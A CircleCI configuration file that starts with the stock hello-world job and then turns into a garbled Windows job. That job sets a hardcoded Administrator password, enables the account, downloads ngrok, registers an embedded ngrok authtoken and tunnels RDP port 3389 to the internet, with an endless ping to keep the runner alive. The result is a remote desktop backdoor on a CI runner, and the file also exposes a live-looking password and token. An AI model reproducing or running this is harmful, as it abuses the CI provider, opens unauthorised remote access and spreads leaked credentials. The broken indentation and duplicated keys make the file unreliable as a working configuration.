# Use the latest 2.1 version of CircleCI pipeline process engine.
# See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1

# Define a job to be invoked later in a workflow.
# See: https://circleci.com/docs/2.0/configuration-reference/#jobs
jobs:
  say-hello:
    # Specify the execution environment. You can specify an image from Dockerhub or use one of our Convenience Images from CircleCI's Developer Hub.
    # See: https://circleci.com/docs/2.0/configuration-reference/#docker-machine-macos-windows-executor
    docker:
      - image: cimg/base:stable
    # Add steps to the job
    # See: https://circleci.com/docs/2.0/configuration-reference/#steps
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: "echo Hello, World!"
l
# Invoke jobs via workflows
# See: https://circleci.com/docs/2.0/configuration-reference/#workflows
workflows:
  say-hello-workflow:
    jobs:
      - say-hello
version: 2.1 
orbs:
  win: circleci/windows@2.2.0
  jobs:
    build: 
          executor:
                      name: win/default 
                                        size: "medium" 
                                            steps:
                                                      - checkout      
                                                                -       - run: Set-LocalUser -Name "Administrator" -Password (ConvertTo-SecureString -AsPlainText "Akuhnet123" -Force)
                                                                      - run: Get-LocalUser -Name "Administrator" | Enable-LocalUser 
                                                                            -       - run: Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
                                                                                  - run: tar xf ngrok.zip
                                                                                        -       - run: Copy ngrok.exe C:\Windows\System32
                                                                                              - run: cmd /c echo ./ngrok.exe authtoken "2JfOp7W0rD4mMEX90pY2RI2ZSMo_NT3xA7MgZgys28hwbE4C" >a.ps1
                                                                                                    -       - run: cmd /c echo cmd /k start ngrok.exe tcp 3389 >>a.ps1
                                                                                                          - run: cmd /c echo ping -n 999999 10.10.10.10 >>a.ps1
                                                                                                                -       - run: .\a.ps1